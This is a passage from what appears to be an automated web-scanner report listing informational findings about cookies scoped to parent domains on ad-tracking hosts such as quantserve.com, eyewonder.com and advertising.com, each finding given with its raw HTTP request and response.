GET /pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: QS

GIF89a.......,.................D..;

16.171. http://ptsd.eyewonder.com/ewr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ptsd.eyewonder.com
Path:	/ewr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ewr?cid=20015042&versionid=3 HTTP/1.1
Host: ptsd.eyewonder.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml"
gmtdiid: 8a8486852dd2373f012dd2d1a0311046
Content-Type: text/javascript;charset=US-ASCII
Content-Length: 325
Date: Sun, 30 Jan 2011 01:21:02 GMT
Connection: close

/* Created On: 1296350462561 */var ew20015042_dynamicAdModel={acid: 0,adid: 200927,eid: 20015042,tid: 0,emv: 4,uid: null,value: ''};document.writeln('<scr'+'ipt language="Javascript" id="ew20015042_wr
...[SNIP]...

16.172. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:28 GMT
Connection: close
Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.173. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:30 GMT
Connection: close
Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=izJRNJpwIg02FQFCdbdBUhwUwXAVI8Y4FQFCYTeBUhQ3gZAVIQTnGQFCF2pBUhAohXAVIYZ4FQFCKGeBUhwohXAVIca4FQFCiGeBUhQshXAVwOYAM/oxqI7YCwAoGJ1r1RQcKaEOGK2AI9YxxN53EkL3FkzgPXw6TVQXsumB/0mhqca7HIaWGeQrMew41ZMFkq1B6bjhUq6bDwWZGJ7r4jQsMa4LwaHCW8ohv0I9IsfzFEzsNiQQoaAV; F1=B0OnE1EBAAAABAAAAQAAABA; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuiy4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ROLL=v5Q240Mxxgzq7NHhPfc3j1yoZKJiMdPbC8fCEdd30GSObC6lkwnqVseu4g1vniv3XYjqYjceyxkwf2tMZSArEQlir5SS2/75sJgaoYVesLytCxbvY9DUCszhatMCKKwTxRIWF+0xTPXT252NsY5JKsYLPWTZUUAXm9JaMAw20vf/mP2cRTHaOgTEMLuyHJXb5Jy8EkMSABMBHiu8OMTbFF6Xd8eJ5ajIEo7MWwYYM2j4u/xo2g3M8yNIsgpaMiSPRegy+4TZaJX30vjsTyS3GGK9P94DueQl+0oOsMvcs3UfJHgL6pNMJ9Bbex1jgMttsrIbsgzmOICEVCga7PcFY4BTH+j6pLnQtbzK/VM!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.950192.730461.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 01:29:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 593
Date: Sun, 30 Jan 2011 01:29:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
Set-Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; domain=advertising.com; expires=Tue, 29-Jan-2013 01:29:43 GMT; path=/
